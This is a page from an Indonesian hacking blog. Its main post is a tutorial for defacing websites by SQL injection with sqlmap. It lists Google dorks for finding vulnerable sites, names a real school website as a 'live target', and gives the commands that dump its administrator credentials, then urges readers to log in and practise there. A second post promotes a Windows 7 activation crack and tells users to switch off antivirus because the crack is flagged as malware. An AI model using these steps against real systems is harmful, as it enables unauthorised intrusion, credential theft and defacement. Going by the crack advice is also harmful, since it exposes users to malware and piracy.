BloggerMates

FOLLOWERS

[ Categories ]

[ Followers ]

Image

[ Partner Link ]

[ Recent Comments ]

Arnoldi-Technology

[ Advertiser ]

Code HTML/Isi Widget kalian
Diberdayakan oleh Blogger.

Ebook Tutorial Belajar Visual Basic

Hallo para sobat Sidoarjo_Hacking akan Share Ebook tutorial Visual Basic :D

Semoga berguna :D

Download Area : DOWNLOAD
Categories: Baca selengkapnya »

Tutorial Deface Dengan SQLmap Di BackTrack 5 (With Live Target)


Halo para sobat Sidoarjo_Hacking, kali ini saya akan menulis tentang Cara Deface Dengan SQL Injection yang dikenal dengan teknik SQLmap di BackTrack. Tools ini sudah ada di dalam File .ISO pada BackTrack.
Disini, saya menggunakan BackTrack 5 R3.
Pertama-tama, cari target yang vuln terhadap SQL Injection, berikut ini sedikit dork dari saya : 
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:Pageid=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
Dan masih banyak lagi dork bertebaran di Google :D

Dalam Tutorial kali ini, saya akan menggunakan target salah satu Sekolah yang ada di Sidoarjo.
http://www.sman2sidoarjo.sch.id/

Untuk mengetahui Website tersebut Vuln atau tidak, silahkan tambahkan tanda ‘ (petik satu) setelah atau sebelum nomor id tersebut, bisa juga dengan menambahkan tanda  - (minus) sebelum nomor id tersebut.
Contoh :                http://www.sman2sidoarjo.sch.id/beritaLengkap.php?id=5''
http://www.sman2sidoarjo.sch.id/beritaLengkap.php?id=’5
http://www.sman2sidoarjo.sch.id/beritaLengkap.php?id=-5

Jika target tersebut Vuln terhadap SQLi, maka akan muncul kira-kira seperti ini :

Jika sudah mendapatkan target, silahkan buka Terminal, kemudian ketikan perintah “cd /pentest/database/sqlmap” (tanpa tanda petik) kemudian Enter.
Kemudian akan muncul seperti ini.

Kemudian untuk mencari nama database, ketikkan “ ./sqlmap.py -uhttp://www.sman2sidoarjo.sch.id/beritaLengkap.php?id=5 --dbs” (tanpa tanda petik) kemudian Enter.

Kemudian akan muncul seperti ini :

Disana kita dapat menemukan 2 Database, yaitu information_schema dan sman2sidoarjo_sman2sda
Setelah kita mendapatkan Database tersebut, kita tulis “./sqlmap.py -uhttp://www.sman2sidoarjo.sch.id/beritaLengkap.php?id=5 -D namadatabase --tables” (tanpa tanda petik) kemudian Enter.

Setelah itu akan muncul beberapa Tabel.


Kemudian kita mencari Colums dengan cara mengetik “./sqlmap.py -uhttp://www.sman2sidoarjo.sch.id/beritaLengkap.php?id=5 -D namadatabase -T namatable --columns” (tanpa tanda petik) kemudian Enter. 

Disini kita akan menjumpai beberapa Columns dari Tabel Admin. 
 
Kemudian, untuk mengetahui isi dari Columns tersebut, kita ketikkan “./sqlmap.py -uhttp://www.sman2sidoarjo.sch.id/beritaLengkap.php?id=5 -D namadatabase -T namatable --dump” (tanpa tanda petik) kemudian Enter.

Nah, kita sekarang sudah menemukan User + Pass Administrator dari Website tersebut:)

Jika sudah mendapatkan User + Pass, pasti Anda tau kan yang harus dilakukan ? :)
Nah, tinggal cari Login Adminnya deh :D
Caranya banyak kok di Google :)

Sekian dulu dari saya, saya ucapkan Terimakasih Banyak :)
Untuk yang ingin belajar SQL Map, silahkan menggunakan live targethttp://www.sman2sidoarjo.sch.id/beritaLengkap.php?id=5

NB : GUNAKANLAH DENGAN BIJAK :)
Categories: Baca selengkapnya »

Windows 7 loader Versi 2.1.0 by DAz


Sidoarjo_Hacking - Pengen aktifin windows 7 tapi susah banget ya? atau kadang pula windows 7 layarnya tiba-tiba hitam?
Nah, untuk mengatasi problem yag ada di atas, Gudangnya Software memberikan solusi bagaimana caranya mengaktifkan Windows 7 dan membuat background windows 7 tidak hitam kembali. caranya menggunakan aplikasi Sob, nama dari aplikasi ini adalah windows loader,kemarin kan saya juga pernah share yang versi 2.0.9. Windows loader yang saya share kali ini merupakan windows loader yang terbaru sob, yaitu versi 2.1.0. Bedanya dari windows loader yang sebelumnya adalah bisa mengaktifkan windows 7 yang diinstall pada laptop/PC yang terbaru gan. Penasaran ? Langsung Download saja .... GRATIS ...
Support operating system :
  • Windows 7 Ultimate
  • Windows 7 Ultimate E
  • Windows 7 Professional
  • Windows 7 Professional E
  • Windows 7 Home Premium
  • Windows 7 Home Premium E
  • Windows 7 Home Basic
  • Windows 7 Starter
  • Windows 7 Starter E
  • Windows Vista Ultimate
  • Windows Vista Business
  • Windows Vista Business N
  • Windows Vista Home Premium
  • Windows Vista Home Basic
  • Windows Vista Home Basic N
  • Windows Vista Starter
  • Windows Server 2008 Enterprise
  • Windows Server 2008 Foundation
  • Windows Server 2008 Standard
  • Windows Small Business Server 2008
  • Windows Storage Server 2008 Standard
  • Windows Server 2008 R2 Enterprise
  • Windows Server 2008 R2 Foundation
  • Windows Server 2008 R2 Standard
  • Windows Small Business Server 2011 Standard

Cara Menggunakanya : 
  1. Download loader ini
  2. Disable antivirusnya, karena loader ini terdeteksi antivirus sebagai virus
  3. Estract menggunakan winrar/winzip
  4. Pada kotak option pilih install
  5. Tunggu prosesnya
  6. Restart
  7. Enjoy....

Passord : NO !!
Download Windows loader 2.1.0 by DAz (SERVER Gudangnya Software)

 Sumber
Categories: , Baca selengkapnya »

Copyright © 2011 - 2012 TennyBlog | All Rights Reserved

Themes by Tricks-Collections Powered by Blogger